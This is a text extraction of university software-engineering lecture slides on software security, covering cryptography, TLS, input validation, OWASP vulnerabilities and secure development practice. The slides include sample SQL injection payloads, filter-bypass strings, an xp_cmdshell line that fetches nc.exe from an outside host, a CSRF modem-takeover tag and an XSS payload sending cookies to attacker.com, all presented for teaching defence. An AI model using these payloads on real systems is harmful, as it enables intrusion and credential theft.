Software Securitywaldenj/classes/2016/fall/csc440/lectures/... · Security Patches A security patch...

Software Security

CSC 440/540: Software Engineering Slide #1

Topics1. Threats, Attacks, and Vulnerabilities2. Cryptography3. Transport Layer Security (TLS)4. Input Validation and Output Encoding5. Web Application Vulnerabilities6. Software Security7. Certifications and Standards8. Secure Development Life Cycle


Threats

IBM X-Force 2012 Trend and Risk Report


Vulnerabilities


Security PatchesA security patch is a software modification designed to prevent or limit a vulnerability. A patch is a type of mitigation.

Administrator may have to apply manually. Some vendors specify certain days to patch, such as

“Patch Tuesday,” the 2nd Tuesday of the month when MS releases updates.

Increasingly software auto updates itself with current patches.


SniffingPacket sniffing is when a program records wired or wireless network packets destined for other hosts.

Wireless traffic is available to everyone nearby. Antennas can extend range to miles. Wired traffic is accessible depending on network

location. If network location unsatisfactory, ARP spoofing can

redirect traffic to sniffing machine.Sniffing applications

Obtain passwords, session cookies, CC numbers, etc. As part of a more complex attack like MITM.


Man in the MiddleA man-in-the-middle attack is an active eaves-dropping attack, in which the attacker connects to both parties and relays messages between them.


Injection AttacksInjection attacks send code to a program instead of the data it was expected, then exploit a vulnerability in the software to execute the code.

Buffer overflows inject machine code into a process. Cross-site scripting injects JavaScript code into a web

page seen by another user. SQL injection injects SQL code into a database query run

by an application.


Attack SurfaceAttack surface: the set of ways an application can be attacked. The larger the attack surface of a system, the more likely an attacker is to exploit its vulnerabilities and the more damage is likely to result from attack.

Attack surface includes Network surface

All systems used by app: Cache, DB, DNS, email, web, etc. All open ports on all of those systems.

Application surface All input fields. Don’t forget about HTTP headers, URLs, etc.

Local surface (files, environment variables, IPCs)


How to secure a system1. Reduce vulnerabilities

Review design for mistakes leading to vulnerabilities. Review code for mistakes leading to vulnerabilities. Use secure third-party software components. Test application for vulnerabilities.

2. Reduce attack surface Eliminate unnecessary types of input. Require authentication to submit input. Validate all input from users. Sandbox system or individual system components.


Cryptography Algorithms to protect confidentiality of data

Symmetric encryption Public key encryption

Kerkhoff’s Principle The security of an encryption scheme should depend only

on the quality of the algorithm and the secrecy of the key. Algorithms to protect integrity of data

Message authentication codes, a/k/a Cryptographically secure hash functions


Symmetric EncryptionAlice and Bob share a secret key, which is used for both encryption and decryption. Advanced Encryption Standard (AES) is the standard symmetric algorithm.

encrypt decrypt

ciphertext

plaintext

sharedsecret

key

sharedsecret

key

CommunicationchannelSender Recipient

Attacker(eavesdropping)

plaintextAlice Bob

Is 128 bits enough?128-bit keyspace permits 2128 keys

340,282,366,920,938,463,463,374,607,431,768,211,456 or

3.4 x 1038 keysCracking 1 trillion (1012) keys per second requires

3.4 x 1026 seconds or 1.08 x 1019 years

Cracking 1 trillion keys per second on 1 billion CPUs requires 1.08 x 1010 years = 10.8 billion years

Note that this argument assumes all keys are equally likely to be used.

Public-Key CryptographySeparate keys for encryption and decryption.

encrypt decrypt

ciphertext

plaintext

publickey

privatekey

CommunicationchannelSender Recipient

Attacker(eavesdropping)

plaintext plaintext

Alice Bob

Is 128-bits enough? Public key encryption algorithms depend on the

difficulty of solving hard mathematical problems, such as factoring. These algorithms can be solved faster than by trying all of the keys.

Key length required depends on Public key algorithm Threat model

See keylength.com for recommendations.


Protect Information in all States1. Storage: information in permanent storage (disk or

tape) that is not currently being accessed.1. Filesystem and/or database encryption.

2. Processing: information in memory (RAM or cache) that is currently being used by a program.

1. Encrypt data before use.2. Delete or re-encrypt after use.

3. Transmission: information in transit between one node and another on a network.

1. Transport Layer Security used for web browser/servers.2. TLS also used for database and email connections.


Message Authentication CodesMACs ensure integrity of data.

1. A computes checksum of data + secret key.2. A sends data and checksum to B. 3. B computes checksum of data received + secret key

and compares with checksum sent by A.4. If checksums match, data was not altered in transit.

How is this secure? Only A and B have secret key. MITM attacker can only see data. If MITM tries to forge checksum, the checksum will be

only of data, not data + secret key.


RandomnessSecurity requires random (unpredictable) numbers for

Cryptographic keys Secrets to use in computing MACs Session IDs

Typical random() functions do not work for this. They are pseudo-random (predictable.) They do not generate enough bits of randomness. You

can’t securely generate a 128-bit key from a function that returns a 64-bit random integer.

Solution: use SecureRandom Almost every language has a secure random library.


Ruby’s SecureRandom classUses OS secure random generator

May use Ivy Bridge random number generator. Time between mouse, keyboard, disk, network events.

SecureRandom returns n random bytes in various formats: > irbirb(main):001:0> require 'securerandom'irb(main):002:0> b=SecureRandom.random_bytes(10)=> "3S\"\xB9;\xCBl=\x82,"irb(main):003:0> b=SecureRandom.hex(10)=> "a422e3eec304b54c8bd5"irb(main):004:0> b=SecureRandom.base64(10)=> "uq5UcUkhl6K3Tw=="irb(main):009:0> b=SecureRandom.urlsafe_base64(10)=> "EAVHlw_6EoOWmg"


Rails Secretsdatabase.yml

Store database username/password directly or export two variables to your environment,

export POSTGRES_USERNAME='username'export POSTGRES_PASSWORD='password'

then in your database.yml file you can dousername: <%= ENV['POSTGRES_USERNAME'] %>password: <%= ENV['POSTGRES_PASSWORD'] %>

secrets.yml Contains secret_key_base, which is used for

cryptographic checksum and encryption of cookies. Can set using environment variables too.


Transport Layer Security (TLS)TLS protocol provides security features for other protocols, such as HTTP, IMAP, etc.

1. Authentication of server to client (using certificate.)2. Optional authentication of client to server.3. Confidentiality (essential for passwords, cookies, &c.)4. Integrity (prevents attackers from modifying data.)

HTTPS is HTTP wrapped in TLS. TLS 1.0 was released in 1999. Old versions named SSL. Vulnerabilities exist in old versions of SSL/TLS. Use most recent version: TLS 1.2 (2008).


TLS CertificatesCertificates identify your server and enable encryption.

Your public encryption key. Your identity and domain name. A digital signature from a trusted third party verifying that

the public key is for the entity named in the identity.Certificate Authorities (CAs) are trusted 3rd parties

Web browsers contain lists of trusted CAs. Domain Validation: CA verified identity by sending an

email to an address at domain name to verify that the request for a certificate came from domain (may be free.)

Extended Validation: CA verifies existence of corporation and that it has control of specified domain (costs more.)


Deploying TLSObtain a TLS Certificate

1. Create a Certificate Signing Request (CSR) with OpenSSL.

2. Send to a Certificate Authority for verification.3. Deploy verified certificate on your web server.

Deployment Best Practices Try Mozilla SSL Configuration Generator See https://www.ssllabs.com/projects/best-practices/

for best practices on deploying TLS.Testing Your Deployment

Enter your URL at https://www.ssllabs.com/ssltest/


https://www.ssllabs.com/projects/best-practices/

https://www.ssllabs.com/ssltest/

Attacks on TLSVersion and renegotiation attacks

Trick browser into using insecure SSL or cipher version.Man-in-the-middle attacks

Sslsniff, but will produce certificate warnings. Sslstrip converts https links to http links, so user

communicates in plaintext with middleman.Certificate attacks

Trick CA into issuing certificate to wrong person. Use crypto weaknesses to create certs for any site.

Implementation attacks Heartbleed(2014): OpenSSL memory reading attack.


Enable TLS in Rails on HerokuIn config/environments/production.rb, uncomment

config.force_ssl = trueThis will result in all pages being served using TLS.

Uses Heroku’s TLS certificate.


Input Validation PrinciplesNever trust input.

Assume dangerous until proven safe.Prefer rejecting data to filtering data.

Difficult to filter out all dangerous inputEvery component should validate data.

Trust is transitive. Don’t trust calling component. Don’t trust called component: shell, SQL


Validation TechniquesIndirect Selection

Allow user to supply index into a list of legitimate values. Application never directly uses user input. Most secure but cannot be applied to all inputs.

Whitelist List of valid patterns or strings. Input rejected unless it matches list. Secure and can be applied to all inputs.

Blacklist List of invalid patterns or strings. Input reject if it matches list. Least secure.


Output EncodingSome input is harmless to the application, but if sent as part of output is dangerous to the user.

User A makes a post containing JavaScript. Application stores post in database. User B views post. JavaScript from user A runs in User B’s browser.

Output encoding Replaces special characters (angle brackets, quotes, etc.)

with HTML entity encodings that browser will treat as text, not code.

Example: encoding > and < as > and < respectively.


Rails Validation Features By default, text is output encoded. What if you want to allow some HTML tags?

<%= raw post.body %> will bypass output encoding, but <%= sanitize post.body %> allows only safe HTML tags.

Sanitize removes dangerous HTML tags.2.3.0 :001 > helper.sanitize("<p>Hello</p>") => "<p>Hello</p>" 2.3.0 :002 > helper.sanitize("<script>alert('XSS');</script>") => "alert('XSS');"

ActionView::Base.sanitized_allowed_tags lists allowed.


OWASP Top 10 (2013)


Injection Injection attacks trick an application into including

unintended commands in the data send to an interpreter.

Interpreters Interpret strings as commands. Ex: SQL, shell (cmd.exe, bash), LDAP, XPath

Key Idea Input data from the application is executed as code by

the interpreter.


SQL Injection

1. App sends form to user.2. Attacker submits form

with SQL exploit data.3. Application builds string

with exploit data.4. Application sends SQL

query to DB.5. DB executes query,

including exploit, sends data back to application.

6. Application returns data to user.

Attacker

Web Server DB Server

Firewall

User

Pass

‘ or 1=1--


SQL Injection in PHP$link = mysql_connect($DB_HOST, $DB_USERNAME,

$DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());

mysql_select_db($DB_DATABASE);$query = "select count(*) from users where username =

'$username' and password = '$password'";$result = mysql_query($query);


SQL Injection Attack #1Unauthorized Access Attempt:

password = ’ or 1=1 --

SQL statement becomes:select count(*) from users where username = ‘user’ and

password = ‘’ or 1=1 --Checks if password is empty OR 1=1, which is always true,

permitting access.


SQL Injection Attack #2Database Modification Attack:

password = foo’; delete from table users whereusername like ‘%

DB executes two SQL statements:select count(*) from users where username = ‘user’ and

password = ‘foo’delete from table users where username like ‘%’


Finding SQL Injection Bugs1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes.

2. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable.

3. Try string or numeric operators.

Oracle: ’||’FOO MS-SQL: ‘+’FOO MySQL: ’ ’FOO

2-2 81+19

49-ASCII(1)


Real Estate Site Hacking

www.website.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

Exploit against http://phprealestatescript.com/


The Problem: String BuildingBuilding a SQL command string with user input in any language is dangerous.

• Variable interpolation.• String concatenation with variables.• String format functions like sprintf().• String templating with variable replacement.


Ineffective Mitigation: BlacklistFilter out known bad SQL metacharacters,such as single quotes.Problems:

1. Numeric parameters don’t use quotes.2. URL escaped metacharacters.3. Unicode encoded metacharacters.4. Did you miss any metacharacters?


Bypassing Blacklist FiltersDifferent case

SeLecT instead of SELECT or selectBypass keyword removal filters

SELSELECTECTURL-encoding

%53%45%4C%45%43%54SQL comments

SELECT/*foo*/num/*foo*/FROM/**/ccSEL/*foo*/ECT

String Building‘us’||’er’chr(117)||chr(115)||chr(101)||chr(114)


Ineffective Mitigation: Stored ProceduresSQL Stored Procedures build strings too:CREATE PROCEDURE dbo.doQuery(@id nchar(128)AS

DECLARE @query nchar(256)SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’EXEC @query

RETURN

and they can be invoked insecurely with user input:

exec sp_login ‘user’ ‘foo’; master..xp_cmdshell ‘tftp e.com GET nc.exe’#


Mitigation: WhitelistReject input that doesn’t match your list of safe characters to accept. Identify what’s good, not what’s bad. Reject input instead of attempting to repair. Still have to deal with single quotes when required,

such as in names.


Mitigation: Prepared Queriesrequire_once 'MDB2.php';

$mdb2 =& MDB2::factory($dsn, $options); if (PEAR::isError($mdb2)) {

die($mdb2->getMessage()); } $sql = “SELECT count(*) from users where username = ? and password =

?”;$types = array('text', 'text'); $sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP); $data = array($username, $password); $sth->execute($data);


ActiveRecord SQLiString building is unsafe

User.where("email = '#{email}'") Product.where("name LIKE '%#{params[:search]}%'") User.where(“email=#{email} AND password=#{pass}“) Post.where(“id = #{id1} OR id = #{id2}”)

If you don’t build strings, you’re safe User.where(email: email) User.where("email = ?", email) Product.where("name LIKE ?”, params[:search]) User.where(email: email, password: pass) Post.where('id = 1').or(Post.where('id = 2'))


Cross-Site Request Forgery1. User authenticates to web application.2. User browses to another site containing a malicious

CSRF attack link somewhere in a web page. <img src=http://yourbank.com/transfer?amount=1000&to=hacker> Also works with iframe, link, bgsound, and other tags.

3. Browser accesses web app with cached credentials, performing whatever action specified by the link.


Example: DSL Modem AttackHome network devices administered via web apps. Standard local IPs.

Attacker inserts 1-pixel imgtag on page. src is URL of form submission,

giving remote admin.No password needed. Software owner assumed

device on trusted local network.

Of course, browser is on the local network too.

<img src= "http://192.168.1.254/Forms/remoteRES_1?NSS_RemotePassword=blehblah&NSS_EnableWANAdminAccessRES=on&timeoutDisable=0&Enable=Enable" alt="" width="1" height="1" />


Mitigating CSRF1. Include a random token in all forms that make requests

to alter data in your application and do not make any changes unless that token is returned.

Use <%= csrf_meta_tags %> in Rails views.Use protect_from_forgery with: :exception in controller.

2. Require that user re-authenticate for high value transactions.

3. Expire sessions quickly to reduce the attacker’s window of opportunity.

4. Use POST instead of GET for all actions that modify data. Add method :post as option in <%= link_to %> tags.


Cross-Site Scripting (XSS)Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing.Impact of XSS

Account hijacking. Browser hijacking (malware hosting.) Information leakage (stored form values, etc.) Virtual defacement.


XSS ExampleWeb application sends browser to an error page after user clicks submit.

https://example.com/error.php?message=Sorry%2C+an +error+occurred


XSS ExampleThe error message is “reflected” back from the Web server to the client in a web page.


XSS ExampleWe can replace the error with JavaScript

https://example.com/error.php?message=<script>alert(‘xss’);</script>


Exploiting the Example1. User logins in and is issued a cookie2. Attacker feed the URL to user

https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script>


Why does XSS Work?Same-Origin Policy

Browser only allows Javascript from site X to access cookies and other data from site X.

Attacker needs to make attack come from site X.Vulnerable Server Program

Any program that returns user input without filtering out dangerous code.


Anatomy of an XSS AttackWeb Server

3. XSS Attack

AttackerUser

4. User clicks on XSS link.

7. Browser runsinjected code.

Evil site saves ID.


XSS URL Exampleshttp://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>

http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script>

http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E


Stored XSSInjected script stored in

Post or comment. Review. Uploaded file.

User views page with injected script. Malicious action is taken while user is logged into site

where malware found. Not technically cross-site.

Attack persists until injected code deleted.


Browser Exploitation Framework BeEF hooks browsers via XSS exploit

Can use as stored or reflected XSS. Hooked browsers are bots controlled by BeEF.

Exploitation modules run on hooked browsers to View browsing history. Identify authenticated sessions. Phishing and other social engineering attacks. Port scans of network browser is running on. Reverse proxy into network browser is running on. Attack targets via Metasploit exploitation framework.


BeEF Screenshot


Mitigating XSS1. Disallow HTML input2. Allow only safe HTML tags3. Encode output

Replace HTML special characters in outputex: replace < with < and > with >also replace (, ), #, &

4. Re-authenticate for important transactions to limit exposure to account hijacking.

5. Content Security Policy (CSP)


Why is Software Security poor?1. Security is seen as something that gets in the way of

software functionality.2. Security is difficult to assess and quantify.3. Security is often not a primary skill or interest of

software developers.4. Time spent on security is time not spent on adding

new and interesting functionality.5. Characteristics of modern software: the trinity of

trouble.


Trinity of TroubleConnectivity

Ubiquitous Internet; wireless & mobile computing.Complexity

Networked, distributed code that can interact with intermediate caches, ad proxies, etc.

Extensibility Systems evolve in unexpected ways, e.g. web browsers,

which support many formats, add-ons, plugins, programming languages, etc.


Software Security Objectives1. Dependability: software functions only as

intended; 2. Trustworthiness: No exploitable vulnerabilities or

malicious logic exist in the software;3. Resilience: If compromised, damage will be

minimized, and it will recover quickly to an acceptable level of operating capacity;

4. Conformance: to requirements and applicable standards and procedures.


System Security CertificationsSoftware system security certifications

Orange Book ISO 15408 Common Criteria PCI Data Security Standard (PCI DSS)

Many standards indirectly impact SSE FISMA (supersedes CSA of 1987) HIPAA (health information privacy) Gramm–Leach–Bliley Act (GLB) SOX (Sarbanes-Oxley)


Orange BookTrusted Computer System Eval Criteria

Issue in 1983 by NSA. Replaced by Common Criteria in 2005.

System classification levelsD: failed evaluation for higher level classificationC: discretionary protection Authentication, DAC, basic auditing

B: mandatory protection MAC, security policy requirements, auditing incl covert channels

A: verified protection Formal specification and design techniques with proofs


Common CriteriaISO standard 15408

International standard, used by US and others.

Protection Profile (PP) Description of system, e.g. anti-virus, firewall, smartcard

Evaluation Assurance Level (EAL)


PCI DSSPCI Data Security Standard (PCI DSS)

Proprietary security standard for organizations that handle card payment information for major credit and debit card companies.

Requirements Network security Cardholder data security Access control and auditing Security policy Vulnerability management, and Develop and maintain secure systems and applications


Secure Development Processes CLASP (Comprehensive, Lightweight Application

Security Process) Correctness-by-Construction (formal methods

based process from Praxis Critical Systems) MS SDL (Microsoft Secure Development Lifecycle) SSE CMM (Secure Software Engineering

Capability Maturity Model) TSP-Secure (Team Software Process for Secure

Software Development) Touchpoints


Security Development Lifecycle1. Code Reviews2. Risk Analysis3. Penetration Testing

SecurityOperations

Requirements Design Coding Testing Maintenance

RiskAnalysis

AbuseCases

Code Reviews +Static Analysis

PenetrationTesting

SecurityTesting

4. Security Testing5. Abuse Cases6. Security Operations


Verification Techniques and CostA

ssur

ance

Cost

PenetrationTesting

FormalVerification

SecurityTesting

CodeReview

StaticAnalysis


Code ReviewsA code review is an examination of source code by developers other than the author to find defects.Benefits

1. Find defects sooner in the lifecycle.2. Find defects with less effort than testing.3. Find different defects than testing.4. Educate developers about vulnerabilities.

Static analysis tools can assist in finding security bugs.


Code Review Process

PlanningAuthorModerator

Prep

Everyone

Meeting

Everyone

Rework

Author

Follow-upAuthorModerator


Security in Design1. Apply secure design principles throughout design

process, such as1. Least Privilege2. Fail-Safe Defaults3. Defense in Depth4. Separation of Privilege

2. Use secure design patterns where applicable.3. Perform an architectural risk analysis to evaluate the

security of your design and to identify design changes that need to be made to improve security.


Architectural Risk AnalysisFix design flaws, not implementation bugs.Risk analysis steps

1. Develop an architecture model (UML or DFDs).2. Identify threats and possible vulnerabilities.3. Develop attack scenarios.4. Rank risks based on probability and impact.5. Develop mitigation strategy.6. Report findings


Black Box TestingAdvantages of Black Box Testing

Examines system as an outsider would. Tester builds understanding of attack surface and

system internals during test process. Can use to evaluate effort required to attack system. Helps test items that aren’t documented.

SystemTest Input Test Output


White and Grey Box TestingWhite Box

Tester knows all information about system. Including source code, design, requirements. Most efficient technique. Avoids security through obscurity.

Grey Box Apply both white box and black box techniques.

Test Input Test Output


Penetration TestingBlack box test of deployed system.Allocate time at end of development to test.

• Often time-boxed: test for n days.• Schedule slips often reduce testing time.• Fixing flaws is expensive late in lifecycle.

Penetration testing tools• Test common vulnerability types against inputs.• Fuzzing: send random data to inputs.• Don’t understand application structure or purpose.


Security Testing

IntendendedFunctionality

ActualFunctionality

Functional testing will find missing functionality.

Injection flaws, buffer overflows, XSS, etc.


Security TestingTwo types of testing

Functional: verify security mechanisms.Adversarial: verify resistance to attacks generated during

risk analysis.Different from traditional penetration testing

• White box.• Use risk analysis to build tests.• Measure security against risk model.


Abuse CasesAnti-requirements

Think about what software should not do.A use case from an adversary’s point of view.

• Obtain Another User’s CC Data.• Alter Item Price.• Deny Service to Application.

Developing abuse casesInformed brainstorming: attack patterns, risks.


Connecting Use and Abuse CasesMitigates – A use case can mitigate the chance that a misuse case will complete successfully.Threatens – An abuse case can threaten a use case by exploiting it or hindering it.

Source: M. Imran Daud, “Secure Software Development Model: A Guide for Secure Software Life Cycle,” Proceedings of the International Multi Conference on Engineers and Computer Scientists, vol. I, March 2010.CSC 440/540: Software Engineering Slide #80

Security OperationsUser security notes

• Software should be secure by default.• Enabling certain features may have risks.• User needs to be informed of security risks.

Incident response• What happens when a vulnerability is reported?• How do you communicate with users?• How do you send updates to users?


References1. Cade Cairns and Daniel Somerfield, The Basics of

Web Application Security, http://martinfowler.com/articles/web-security-basics.html, 2016.

2. Michael Howard and Steve Lipner, The Security Development Lifecycle, Microsoft Press, 2006.

3. Gary McGraw, Software Security, Addison-Wesley, 2006.

4. Ruby on Rails Security Guide, http://guides.rubyonrails.org/security.html, 2016.


http://martinfowler.com/articles/web-security-basics.html

http://guides.rubyonrails.org/security.html

Software Securitywaldenj/classes/2016/fall/csc440/lectures/... · Security Patches A security patch...

Documents

Transcript of Software Securitywaldenj/classes/2016/fall/csc440/lectures/... · Security Patches A security patch...